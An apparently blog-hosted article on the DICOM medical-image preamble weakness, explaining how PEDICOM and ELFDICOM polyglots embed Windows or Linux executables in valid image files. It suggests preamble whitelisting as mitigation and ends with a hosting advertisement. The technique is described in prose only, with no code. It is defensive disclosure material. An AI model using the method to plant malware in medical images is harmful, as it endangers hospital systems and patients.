A high-severity vulnerability within DICOM, the standard file protocol for medical imaging, persists exploitable years after its initial discovery. This flaw permits attackers to integrate malicious code into legitimate medical image files. While earlier research highlighted its impact on Windows-based medical systems, Praetorian has introduced a proof of concept named ELFDICOM, which extends this vulnerability to Linux environments, posing a risk to almost all operating systems used in healthcare today.
Digital Imaging and Communications in Medicine (DICOM) has been the leading file format for medical imaging for over two decades, critical for practices such as radiology and cardiology. It facilitates the exchange of detailed patient information, allowing for accurate diagnosis, treatment planning, and medical research.
DICOM files contain two main parts: the File Header and the Data Set. The File Header has a Preamble, which is a reserved space of 128 bytes lacking a defined structure. This design promotes extensibility but creates security weaknesses, allowing malicious polyglots to be formed. The Prefix within the File Header acts as magic bytes to identify the file’s format, while the Data Set includes numerous Data Elements for storing metadata or image data in a tag-value format.
In computational terms, a polyglot is a file that can be recognized in multiple formats. It can exhibit different behaviors depending on the interpreter used to process it. For instance, a single file might embody valid C, PHP, and Bash code simultaneously, depending on how it’s executed on a Linux system.
The threat escalates when the DICOM file format’s vulnerability meets the polyglot capability. In 2019, researcher Markel Picado Ortiz demonstrated this dangerous combination by creating a polyglot called PEDICOM, embedding a Windows PE executable within a DICOM file. This file, when given a ".exe" extension, would execute on Windows systems while still appearing as a legitimate DICOM image file.
Ortiz’s research allows for not only complex malware but also simpler malicious files using a shebang for Linux systems. For instance, a shell script can be executed directly through a DICOM file, enabling attackers to launch remote scripts simply. This attack methodology reveals how connected DICOM devices can fall prey to online or offline exploits.
To significantly extend the payload size for offline attacks, ELFDICOM merges ELF executables with DICOM files. The ELF (Executable and Linkable Format) can include extensive executable code. Using ELF, attackers can embed a fully functional payload while ensuring the file remains a valid DICOM image. The process involves creating an executable, inserting it into a DICOM file, and setting the executable bit. This ELF-DICOM hybrid retains its functionality as a medical image while also being a fully operational executable.
The architecture of DICOM allows for arbitrary bytes at the file’s start, rendering complete mitigation impossible. However, effective strategies can be implemented to detect and limit the risks posed by these vulnerabilities. For instance, implementing a whitelist to check DICOM file preambles is one solution, ensuring that only recognized patterns are accepted while blocking known harmful signatures.
Going forward, these infections highlight the need for healthcare professionals to remain vigilant and seek improved security protocols. Continual efforts in developing more secure alternatives will bolster the overall security of crucial industries susceptible to these types of vulnerabilities.
References:
ChicagoVPS is your gateway to unparalleled hosting solutions. Our state-of-the-art datacenters and powerful network ensures lightning-fast speeds and uninterrupted connectivity for your websites and applications. Whether you’re a startup looking for scalable resources or an enterprise in need of enterprise-grade hosting, our range of plans and customizable solutions guarantee a perfect fit. Trust in ChicagoVPS to deliver excellence, combining unmatched reliability and top-tier support.
For Inquiries or to receive a personalized quote, please reach out to us through our contact form here or email us at sales@chicagovps.net.
